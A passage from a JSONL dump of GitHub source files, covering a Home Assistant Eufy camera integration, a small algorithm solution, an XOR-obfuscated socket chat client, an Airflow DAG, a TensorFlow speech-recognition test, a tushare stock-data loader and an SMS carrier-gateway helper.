True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - is_rtsp_streaming\"\n )\n if self.device.is_p2p_streaming is True:\n self.start_p2p()\n self.device.stream_source_type = STREAMING_SOURCE_P2P\n self.device.stream_source_address = self.p2p_url\n self.device.is_streaming = True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - is_p2p_streaming\"\n )\n if (\n self.device.is_rtsp_streaming is False\n and self.device.is_p2p_streaming is False\n ) and self.device.is_streaming is True:\n if self.device.stream_source_type is STREAMING_SOURCE_P2P:\n self.stop_p2p()\n self.device.stream_source_type = None\n self.device.stream_source_address = None\n self.device.is_streaming = False\n _LOGGER.debug(f\"{DOMAIN} {self.name} - set_is_streaming - no_streaming\")\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - end - {self.device.is_rtsp_streaming} - {self.device.is_p2p_streaming} - {self.device.is_streaming}\"\n )\n self._attr_is_streaming = self.device.is_streaming\n\n async def initiate_turn_on(self):\n await self.coordinator.hass.async_add_executor_job(self.turn_on)\n await wait_for_value(self.device.__dict__, \"is_streaming\", False, interval=0.5)\n\n async def stream_source(self):\n if self.device.is_streaming is False:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - stream_source - start - {self.device.is_streaming}\"\n )\n if self.coordinator.config.auto_start_stream is False:\n return None\n await self.initiate_turn_on()\n _LOGGER.debug(f\"{DOMAIN} {self.name} - stream_source - initiate finished\")\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - stream_source - address - {self.device.stream_source_address}\"\n )\n if self.device.is_streaming is False:\n return None\n return self.device.stream_source_address\n\n def camera_image(self, width=None, height=None) -> bytes:\n return asyncio.run_coroutine_threadsafe(\n self.async_camera_image(width, height), self.coordinator.hass.loop\n ).result()\n\n async def async_camera_image(self, width=None, height=None) -> bytes:\n # if streaming is active, do not overwrite live image\n if self.device.is_streaming is True:\n size_command = None\n if width and height:\n size_command = f\"-s {width}x{height}\"\n image_frame_bytes = await ImageFrame(self.ffmpeg_binary).get_image(\n self.device.stream_source_address, extra_cmd=size_command\n )\n if (image_frame_bytes is not None) and len(image_frame_bytes) > 0:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image len - {len(image_frame_bytes)}\"\n )\n self.picture_bytes = image_frame_bytes\n self.picture_url = None\n self.no_picture_counter = 0\n else:\n if self.no_picture_counter > 0:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image - no image - stop\"\n )\n if self.device.is_p2p_streaming is True:\n await self.async_stop_p2p_livestream()\n if self.device.is_rtsp_streaming is True:\n await self.async_stop_rtsp_livestream()\n self.no_picture_counter = self.no_picture_counter + 1\n else:\n current_picture_url = self.device.state.get(\"pictureUrl\", \"\")\n self.no_picture_counter = 0\n if self.picture_url != current_picture_url:\n async with async_get_clientsession(self.coordinator.hass).get(\n current_picture_url\n ) as response:\n if response.status == 200:\n self.picture_bytes = await response.read()\n self.picture_url = current_picture_url\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - camera_image -{current_picture_url} - {len(self.picture_bytes)}\"\n )\n return self.picture_bytes\n\n async def handle_async_mjpeg_stream(self, request):\n stream = CameraMjpeg(self.ffmpeg_binary)\n await stream.open_camera(await self.stream_source())\n\n try:\n return await async_aiohttp_proxy_stream(\n self.hass,\n request,\n await stream.get_reader(),\n self.ffmpeg_content_type,\n )\n finally:\n await stream.close()\n\n def turn_on(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.start_stream_function(), self.coordinator.hass.loop\n ).result()\n\n def turn_off(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.stop_stream_function(), self.coordinator.hass.loop\n ).result()\n\n async def check_and_notify_rtsp_enabled(self):\n if self.device.state.get(\"rtspStream\") is False:\n self.coordinator.hass.components.persistent_notification.async_create(\n f\"RSTP needs to enabled for Camera {self.device.name}\",\n title=\"Eufy Security - Not Enabled - RTSP\",\n notification_id=\"eufy_security_not_enabled_rtsp\",\n )\n return False\n return True\n\n async def check_and_notify_rtsp_supported(self):\n if self.device.state.get(\"rtspStream\", None) is None:\n self.coordinator.hass.components.persistent_notification.async_create(\n f\"Camera {self.device.name} does not support RTSP\",\n title=\"Eufy Security - Not Supported - RTSP\",\n notification_id=\"eufy_security_not_supported_rtsp\",\n )\n return False\n return True\n\n async def async_start_p2p_livestream(self, executed_at=None) -> None:\n await self.coordinator.async_set_p2p_livestream(\n self.device.serial_number, \"start\"\n )\n\n async def async_stop_p2p_livestream(self) -> None:\n await self.coordinator.async_set_p2p_livestream(\n self.device.serial_number, \"stop\"\n )\n\n async def async_start_rtsp_livestream(self, executed_at=None) -> None:\n if (\n await self.check_and_notify_rtsp_supported() is True\n and await self.check_and_notify_rtsp_enabled()\n ):\n await self.coordinator.async_set_rtsp_livestream(\n self.device.serial_number, \"start\"\n )\n\n async def async_stop_rtsp_livestream(self) -> None:\n if (\n await self.check_and_notify_rtsp_supported() is True\n and await self.check_and_notify_rtsp_enabled()\n ):\n await self.coordinator.async_set_rtsp_livestream(\n self.device.serial_number, \"stop\"\n )\n\n async def async_enable_rtsp(self) -> None:\n if await self.check_and_notify_rtsp_supported() is True:\n await self.coordinator.async_set_rtsp(self.device.serial_number, True)\n\n async def async_disable_rtsp(self) -> None:\n if await self.check_and_notify_rtsp_supported() is True:\n await self.coordinator.async_set_rtsp(self.device.serial_number, False)\n\n async def async_enable(self) -> None:\n await self.coordinator.async_set_device_state(self.device.serial_number, True)\n\n async def async_disable(self) -> None:\n await self.coordinator.async_set_device_state(self.device.serial_number, False)\n\n async def async_get_rtsp_livestream_status(self) -> None:\n await self.coordinator.async_get_rtsp_livestream_status(\n self.device.serial_number\n )\n\n async def async_quick_response(self, voice_id) -> None:\n if self.device.is_doorbell() is False:\n _LOGGER.warn(\n f\"{DOMAIN} {self.name} - quick_response is only supported for doorbells\"\n )\n raise HomeAssistantError(\n f\"{self.name} - quick_response is only supported for doorbells\"\n )\n await self.coordinator.async_quick_response(self.device.serial_number, voice_id)\n\n def async_reset_alarm(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.coordinator.async_reset_camera_alarm(self.device.serial_number),\n self.coordinator.hass.loop,\n ).result()\n\n def async_alarm_trigger_with_duration(self, duration: int = 10) -> None:\n asyncio.run_coroutine_threadsafe(\n self.coordinator.async_trigger_camera_alarm(\n self.device.serial_number, duration\n ),\n self.coordinator.hass.loop,\n ).result()\n\n @property\n def is_on(self):\n return self.device.state.get(\"enabled\", True)\n\n @property\n def motion_detection_enabled(self):\n return self.device.state.get(\"motionDetection\", False)\n\n @property\n def extra_state_attributes(self):\n custom_attributes = {\n \"is_streaming\": self.device.is_streaming,\n \"stream_source_type\": self.device.stream_source_type,\n \"stream_source_address\": self.device.stream_source_address,\n \"codec\": self.device.codec,\n \"is_rtsp_streaming\": self.device.is_rtsp_streaming,\n \"is_p2p_streaming\": self.device.is_p2p_streaming,\n }\n if self.device.voices:\n custom_attributes[\"voices\"] = self.device.voices\n return {\n \"inherited\": super().state_attributes,\n \"custom\": custom_attributes,\n }\n","repo_name":"bachya/smart-home","sub_path":"hass/settings/custom_components/eufy_security/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":22669,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"37"} +{"seq_id":"70249610348","text":"while True:\n N = int(input())\n\n if(N == 0):\n break\n\n students = []\n\n for i in range(N):\n name, height = input().split()\n\n students.append([name, float(height)])\n\n students.sort(key=lambda x: x[1], reverse=True)\n\n tmp = students[0][1]\n\n for i in range(N):\n if students[i][1] != tmp:\n break\n print(students[i][0], end=\" \")\n print()\n","repo_name":"firemancha/Algorithm","sub_path":"Baekjoon/11000~11999/[11292]키 큰 사람/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2584257082","text":"#!/usr/bin/python2\n#-*- coding:utf-8 -*-\n\nimport os\nimport time\nimport platform\nimport socket\nimport sys\nimport select\nimport logging\nimport readline\n\nbanner = '''\n\\033[1;96m\n ██████ ▓█████ ▄████▄ ██▀███ ▓█████▄▄▄█████▓\n▒██ ▒ ▓█ ▀ ▒██▀ ▀█ ▓██ ▒ ██▒▓█ ▀▓ ██▒ ▓▒\n░ ▓██▄ ▒███ ▒▓█ ▄ ▓██ ░▄█ ▒▒███ ▒ ▓██░ ▒░\n ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██▀▀█▄ ▒▓█ ▄░ ▓██▓ ░ \n▒██████▒▒░▒████▒▒ ▓███▀ ░░██▓ ▒██▒░▒████▒ ▒██▒ ░ \n▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░░ ▒▓ ░▒▓░░░ ▒░ ░ ▒ ░░ \n░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░▒ ░ ▒░ ░ ░ ░ ░ \n░ ░ ░ ░ ░ ░░ ░ ░ ░ \n ░ ░ ░░ ░ ░ ░ ░ \n ░ \n\n\n [ Created By Unamed ]\n [  Github : \\033[31mUnam3dd\\033[00m ]\n [ Insta : \\033[31m0x4eff\\033[00m ]\n\n Encrypted Message Live With XOR\n\\033[00m\n'''\n\ntry:\n from datetime import datetime\nexcept ImportError:\n print('\\033[31m[!] Error Datetime Install Datetime !')\n\ntry:\n from itertools import izip, cycle\n import base64\nexcept ImportError:\n print('\\033[31m[!] Error IterTools, Base64')\n\ndef xor_crypt_string(data, key, encode=False, decode=False):\n if decode:\n data = base64.decodestring(data)\n xored = ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key)))\n if encode:\n return base64.encodestring(xored).strip()\n return xored\n\nclass SimpleCompleter(object):\n\n def __init__(self, options):\n self.options = sorted(options)\n return\n\n def complete(self, text, state):\n response = None\n if state == 0:\n # This is the first time for this text, so build a match list.\n if text:\n self.matches = [s\n for s in self.options\n if s and s.startswith(text)]\n logging.debug('%s matches: %s', repr(text), self.matches)\n else:\n self.matches = self.options[:]\n logging.debug('(empty input) matches: %s', self.matches)\n\n # Return the state'th item from the match list,\n # if we have that many.\n try:\n response = self.matches[state]\n except IndexError:\n response = None\n logging.debug('complete(%s, %s) => %s',repr(text), state, repr(response))\n return response\n\ndef input_console(username):\n t = datetime.now().strftime('%H:%M:%S')\n sys.stdout.write('[\\033[1;94m%s\\033[00m] \\033[32m%s$ ' % (t,username))\n sys.stdout.flush()\n\ndef run_client(host,port,xor_key,username):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n try:\n s.connect((host,int(port)))\n except:\n print('\\033[31m[!] Error Unable Connect %s:%s' % (host,port))\n sys.exit()\n \n input_console(username)\n while True:\n socket_list = [sys.stdin, s]\n read_sockets, write_sockets, error_sockets = select.select(socket_list, [], [])\n for sock in read_sockets:\n if sock ==s:\n data = s.recv(4096)\n if not data:\n print('\\n[!] (503) Server Error !')\n else:\n decode_data = xor_crypt_string(data,xor_key,decode=True)\n sys.stdout.write('\\n\\033[31m'+decode_data+'\\033[00m')\n input_console(username)\n else:\n msg = sys.stdin.readline()\n \n if msg.startswith('/exit')==True:\n data_encode = xor_crypt_string(msg,xor_key,encode=True)\n s.send(data_encode)\n sys.exit()\n\n elif msg.startswith('/clear')==True:\n clear_os()\n string = username+\":\\033[1;96m%s has clear console\\033[00m\\n\" % (username)\n data_encode = xor_crypt_string(string,xor_key,encode=True)\n s.send(data_encode)\n input_console(username)\n\n else:\n string = username+\":\"+msg\n data_encode = xor_crypt_string(string,xor_key,encode=True)\n s.send(data_encode)\n print('\\033[32m[\\033[34m+\\033[32m] Message Sent !')\n input_console(username)\n\ndef clear_os():\n if 'Linux' not in platform.platform():\n os.system('cls')\n \n elif 'Windows' not in platform.platform():\n os.system('clear')\n\n\nif __name__ == '__main__':\n if 'Linux' not in platform.platform():\n sys.exit(\"[*] Linux Platform Required !\")\n\n print(banner)\n if len(sys.argv) <5:\n print('usage : %s ' % (sys.argv[0]))\n else:\n clear_os()\n print(banner)\n run_client(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])","repo_name":"HiFeV/Train-2018-2020","sub_path":"S3cr3t/S3cr3t_client.py","file_name":"S3cr3t_client.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70235436586","text":"from airflow import DAG\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom airflow.utils.dates import days_ago\r\n\r\nfrom airflow.operators.bash import BashOperator\r\n\r\ndefault_args = {\r\n 'owner': 'airflow',\r\n 'depends_on_past': False,\r\n 'email': ['lax@gmail.com', 'lax1@gmail.com'],\r\n 'email_on_failure': False,\r\n 'email_on_retry': False,\r\n 'retries': 1,\r\n 'retry_delay': timedelta(minutes=5)\r\n}\r\nwith DAG(\r\n 'hello_world',\r\n default_args=default_args,\r\n description='Hello world description',\r\n start_date=days_ago(20),\r\n tags=['lax']\r\n) as dag:\r\n\r\n t1 = BashOperator(\r\n task_id='print_msg',\r\n bash_command=\"echo 'hello_world'\"\r\n )\r\n\r\n t2 = BashOperator(\r\n task_id='print_msg_again',\r\n bash_command=\"echo 'hello_world again'\"\r\n )\r\n\r\n t1 << t2\r\n","repo_name":"laxmikanth-d/Airflow","sub_path":"dags/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36689405845","text":"# coding=utf-8\n\nimport logging\nimport os\nfrom os import path\n\nimport tensorflow as tf\n\ntry:\n from . import asr\nexcept SystemError:\n import asr\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_float('gpu_memory_fraction', 0.4, 'gpu占用内存比例')\ntf.app.flags.DEFINE_string('model_dir', \"../data/model_distribute/\",\n '保存模型数据的文件夹')\n\n\ndef test():\n \"\"\"单独的,测试模型效果.\n\n \"\"\"\n data_dir = FLAGS.data_dir\n cv_batch_size = FLAGS.cv_batch_size\n cv_maxsize_file = path.join(data_dir, FLAGS.cv_maxsize_file)\n dev_data_config = asr.read_data_config(cv_maxsize_file)\n dev_data = asr.get_dev_data(dev_data_config, cv_batch_size)\n dev_examples_num = dev_data_config.example_number\n dev_num_batches_per_epoch = int(dev_examples_num / cv_batch_size)\n\n with tf.variable_scope(\"inference\") as scope:\n dev_ctc_in, dev_targets, dev_seq_len = asr.rnn(dev_data, dev_data_config,\n cv_batch_size)\n\n dev_decoded, dev_log_prob = tf.nn.ctc_greedy_decoder(dev_ctc_in,\n dev_seq_len)\n\n edit_distance = tf.edit_distance(tf.to_int32(dev_decoded[0]), dev_targets,\n normalize=False)\n\n batch_error_count = tf.reduce_sum(edit_distance, name=\"batch_error_count\")\n batch_label_count = tf.shape(dev_targets.values)[0]\n\n local_init = tf.initialize_local_variables()\n saver = tf.train.Saver()\n\n gpu_options = tf.GPUOptions(\n per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as session:\n\n ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n saver.restore(session, ckpt.model_checkpoint_path)\n\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n\n logging.info(\"从%s载入模型参数, global_step = %d\",\n ckpt.model_checkpoint_path, global_step)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=session, coord=coord)\n\n try:\n dev_error_count = 0\n dev_label_count = 0\n\n for batch in range(dev_num_batches_per_epoch):\n cv_error_count_value, cv_label_count = session.run(\n [batch_error_count, batch_label_count])\n\n dev_error_count += cv_error_count_value\n dev_label_count += cv_label_count\n\n dev_acc_ratio = (dev_label_count - dev_error_count) / dev_label_count\n\n logging.info(\"eval: eval_acc = %.3f \", dev_acc_ratio)\n except tf.errors.OutOfRangeError:\n logging.info(\"训练完成.\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n\n\ndef main(_):\n test()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='./test.log',\n filemode='a')\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n tf.app.run()\n","repo_name":"thewintersun/asrtrain","sub_path":"newbin/asr_test.py","file_name":"asr_test.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21202970869","text":"# -*- coding: utf-8 -*-\n__author__ = 'SlovEnt'\n__date__ = '2019/1/7 10:50'\n\n# %% 导入包\nimport tushare as ts\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nimport os\nimport re\nimport time\nfrom multiprocessing import Pool, Manager\n# from exec_class import Tushare_Proc\nfrom tushare_exe_class import Tushare_Proc_v2\nimport traceback\n\nfrom chpackage.param_info import get_param_info\nBASE_DIR = os.path.dirname(os.getcwd())\nCONFIG_INFO_FILE = \"%s/%s\" % (BASE_DIR, \"Config.ini\")\nPARAINFO = get_param_info(CONFIG_INFO_FILE)\n\n# 引入mysql操作函数\nfrom chpackage import torndb\nmysqlExe = torndb.Connection(\n host = \"{0}:{1}\".format(PARAINFO[\"DB_HOST\"], PARAINFO[\"DB_PORT\"]),\n database = PARAINFO[\"DB_NAME\"],\n user = PARAINFO[\"USER_NAME\"],\n password = PARAINFO[\"USER_PWD\"],\n)\n\npro = ts.pro_api(PARAINFO[\"TUSHARE_TOKEN\"])\n\n# tp = Tushare_Proc(pro, mysqlExe)\n# tp = Tushare_Proc(pro, mysqlExe, busiDate=\"20190106\")\ntp2 = Tushare_Proc_v2(pro, mysqlExe, busiDate=\"20190106\")\n\ndef get_tpdatas_stock_basic(cFlag, q):\n\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"inputCode\"] = \"\"\n argsDict[\"codeType\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_stock_basic(argsDict)\n\n if len(strSqlList) == 0:\n return\n\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_stock_company(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n\n argsDict[\"inputCode\"] = \"SSE\"\n strSqlList = tp2.get_tpdatas_stock_company(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n argsDict[\"inputCode\"] = \"SZSE\"\n strSqlList = tp2.get_tpdatas_stock_company(argsDict)\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_hs_const(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"hs_type\"\n\n argsDict[\"inputCode\"] = \"SH\"\n strSqlList = tp2.get_tpdatas_hs_const(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n argsDict[\"inputCode\"] = \"SZ\"\n strSqlList = tp2.get_tpdatas_hs_const(argsDict)\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_namechange(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_namechange(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_new_share(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"start_date\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_new_share(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_concept(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"src\"\n argsDict[\"inputCode\"] = \"ts\"\n\n strSqlList = tp2.get_tpdatas_concept(argsDict)\n\n if len(strSqlList) == 0:\n return\n\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_index_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"market\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_index_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fund_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"market\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_fund_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fut_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_fut_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_opt_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_opt_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fund_company(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_fund_company(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n\ndef put_in_db(q, i):\n try:\n while True:\n strSql = q.get()\n print(strSql)\n mysqlExe.execute(strSql)\n except Exception as e:\n print(e, strSql)\n\ndef run_m_get_all_basic_datas():\n\n manage = Manager()\n q = manage.Queue(maxsize=100000)\n\n p = Pool(15)\n\n for i in range(8):\n p.apply_async(func=put_in_db, args=(q,i,))\n\n # 第一个入参明确是否强制重新采集 0 采集后不重采 1 强制重采\n p.apply_async(func=get_tpdatas_stock_basic, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_stock_company, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_namechange, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_hs_const, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_new_share, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_concept, args=(\"0\",q,))\n\n sysDicts = tp2.get_datas_for_db_sys_dict(\"market\")\n for sysDict in sysDicts:\n p.apply_async(func=get_tpdatas_index_basic, args=(\"0\", q, sysDict[\"dict_item\"]))\n\n p.apply_async(func=get_tpdatas_fund_basic, args=(\"0\", q, \"E\"))\n p.apply_async(func=get_tpdatas_fund_basic, args=(\"0\", q, \"O\"))\n p.apply_async(func=get_tpdatas_fund_company, args=(\"0\", q))\n\n\n # 期货合约信息表\n exchangeCodeList = [\"CFFEX\",\"DCE\",\"CZCE\",\"SHFE\",\"INE\"]\n for exchangeCode in exchangeCodeList:\n p.apply_async(func=get_tpdatas_fut_basic, args=(\"0\", q, exchangeCode))\n\n # 期权合约\n exchangeCodeList = [\"SSE\"]\n for exchangeCode in exchangeCodeList:\n p.apply_async(func=get_tpdatas_opt_basic, args=(\"1\", q, exchangeCode))\n\n p.close()\n p.join()\n\n\nif __name__ == '__main__':\n\n # 获取各交易所的交易日历,每年年底再打开获取打开获取\n # exchangeCodeList = tp2.get_datas_for_db_sys_dict(\"exchange\")\n # for exchangeCode in exchangeCodeList:\n # tp2.get_tpdatas_trade_cal_2_db(exchangeCode[\"dict_item\"],\"20191201\",\"20101231\")\n\n run_m_get_all_basic_datas()\n","repo_name":"SlovEnt/tushare_env","sub_path":"PROC_LIST/m_get_all_basic_datas.py","file_name":"m_get_all_basic_datas.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38408116789","text":"# -*- coding: utf-8 -*-\n'''\nSMS functions for CorpScores.\n\nSpecial thanks to github.com/brendanlim/sms-fu for the carrier gateways.\n'''\n\n\nfrom flask.ext.mail import Message\n\nfrom .extensions import mail\n\n\ndef split_msg(message):\n '''Split an sms into 160char chunks, if possible at newlines.'''\n max_len = 130\n chunks = []\n while len(message) > max_len:\n # Split message into chunks gracefully at newlines\n try:\n idx = message[:max_len].rindex('\\n')\n except ValueError:\n # No newline found in first max_len characters\n idx = max_len\n chunks.append(message[:idx])\n message = message[idx:].strip()\n if message:\n chunks.append(message)\n return chunks\n\n\ndef send_sms(carrier, number, message, subject=None, conn=None):\n '''Send an SMS message'''\n chunks = split_msg(message)\n for chunk in chunks:\n if subject:\n msg = Message(subject,\n sender=mail.app.config['SMS_DEFAULT_SENDER'],\n recipients=[str(number) + carriers[carrier]['suffix']])\n else:\n msg = Message('',\n sender=mail.app.config['SMS_DEFAULT_SENDER'],\n recipients=[str(number) + carriers[carrier]['suffix']])\n msg.body = chunk\n if conn:\n conn.send(msg)\n else:\n mail.send(msg)\n\n# US Carriers\ncarriers = {\n \"alltel\": {\n \"name\": \"Alltel\",\n \"suffix\": \"@message.alltel.com\"\n },\n \"ameritech\": {\n \"name\": \"Ameritech\",\n \"suffix\": \"@paging.acswireless.com\"\n },\n \"at&t\": {\n \"name\": \"AT&T\",\n \"suffix\": \"@txt.att.net\"\n },\n \"bell_atlantic\": {\n \"name\": \"Bell Atlantic\",\n \"suffix\": \"@message.bam.com\"\n },\n \"bellsouthmobility\": {\n \"name\": \"Bellsouth Mobility\",\n \"suffix\": \"@blsdcs.net\"\n },\n \"blueskyfrog\": {\n \"name\": \"BlueSkyFrog\",\n \"suffix\": \"@blueskyfrog.com\"\n },\n \"boost\": {\n \"name\": \"Boost Mobile\",\n \"suffix\": \"@myboostmobile.com\"\n },\n \"cellularsouth\": {\n \"name\": \"Cellular South\",\n \"suffix\": \"@csouth1.com\"\n },\n \"comcast\": {\n \"name\": \"Comcast PCS\",\n \"suffix\": \"@comcastpcs.textmsg.com\"\n },\n \"cricket\": {\n \"name\": \"Cricket\",\n \"suffix\": \"@sms.mycricket.com\"\n },\n \"kajeet\": {\n \"name\": \"kajeet\",\n \"suffix\": \"@mobile.kajeet.net\"\n },\n \"metropcs\": {\n \"name\": \"Metro PCS\",\n \"suffix\": \"@mymetropcs.com\"\n },\n \"nextel\": {\n \"name\": \"Nextel\",\n \"suffix\": \"@messaging.nextel.com\"\n },\n \"powertel\": {\n \"name\": \"Powertel\",\n \"suffix\": \"@ptel.net\"\n },\n \"pscwireless\": {\n \"name\": \"PSC Wireless\",\n \"suffix\": \"@sms.pscel.com\"\n },\n \"qwest\": {\n \"name\": \"Qwest\",\n \"suffix\": \"@qwestmp.com\"\n },\n \"southernlink\": {\n \"name\": \"Southern Link\",\n \"suffix\": \"@page.southernlinc.com\"\n },\n \"sprint\": {\n \"name\": \"Sprint PCS\",\n \"suffix\": \"@messaging.sprintpcs.com\"\n },\n \"suncom\": {\n \"name\": \"Suncom\",\n \"suffix\": \"@tms.suncom.com\"\n },\n \"t_mobile\": {\n \"name\": \"T-Mobile\",\n \"suffix\": \"@tmomail.net\"\n },\n \"tracfone\": {\n \"name\": \"Tracfone\",\n \"suffix\": \"@mmst5.tracfone.com\"\n },\n \"telus_mobility\": {\n \"name\": \"Telus Mobility\",\n \"suffix\": \"@msg.telus.com\"\n },\n \"uscellular\": {\n \"name\": \"US Cellular\",\n \"suffix\": \"@email.uscc.net\"\n },\n \"virgin\": {\n \"name\": \"Virgin Mobile\",\n \"suffix\": \"@vmobl.net\"\n },\n \"verizon\": {\n \"name\": \"Verizon Wireless\",\n \"suffix\": \"@vtext.com\"\n }\n}\n\n# International Carriers\ninternational_carriers = {\n \"aliant_canada\": {\n \"name\": \"Aliant (Canada)\",\n \"suffix\": \"@chat.wirefree.ca\"\n },\n \"beeline_ua\": {\n \"name\": \"Beeline\",\n \"suffix\": \"@sms.beeline.ua\"\n },\n \"bellmobility_canada\": {\n \"name\": \"Bell Mobility (Canada)\",\n \"suffix\": \"@txt.bell.ca\"\n },\n \"bpl_mobile\": {\n \"name\": \"BPL Mobile\",\n \"suffix\": \"@bplmobile.com\"\n },\n \"claro_brazil\": {\n \"name\": \"Claro (Brazil)\",\n \"suffix\": \"@clarotorpedo.com.br\"\n },\n \"claro_nicaragua\": {\n \"name\": \"Claro (Nicaragua)\",\n \"suffix\": \"@ideasclaro-ca.com\"\n },\n \"du_arab_emirates\": {\n \"name\": \"Du (UAE)\",\n \"suffix\": \"@email2sms.ae\"\n },\n \"e_plus_germany\": {\n \"name\": \"E-Plus (Germany)\",\n \"suffix\": \"@smsmail.eplus.de\"\n },\n \"etisalat_arab_emirates\": {\n \"name\": \"Etisalat (UAE)\",\n \"suffix\": \"@email2sms.ae\"\n },\n \"fido_canada\": {\n \"name\": \"Fido\",\n \"suffix\": \"@fido.ca\"\n },\n \"koodoo\": {\n \"name\": \"Koodoo (Canada)\",\n \"suffix\": \"@msg.koodomobile.com\"\n },\n \"manitobatelecom_canada\": {\n \"name\": \"Manitoba Telecom (Canada)\",\n \"suffix\": \"@text.mtsmobility.com\"\n },\n \"mobinil_egypt\": {\n 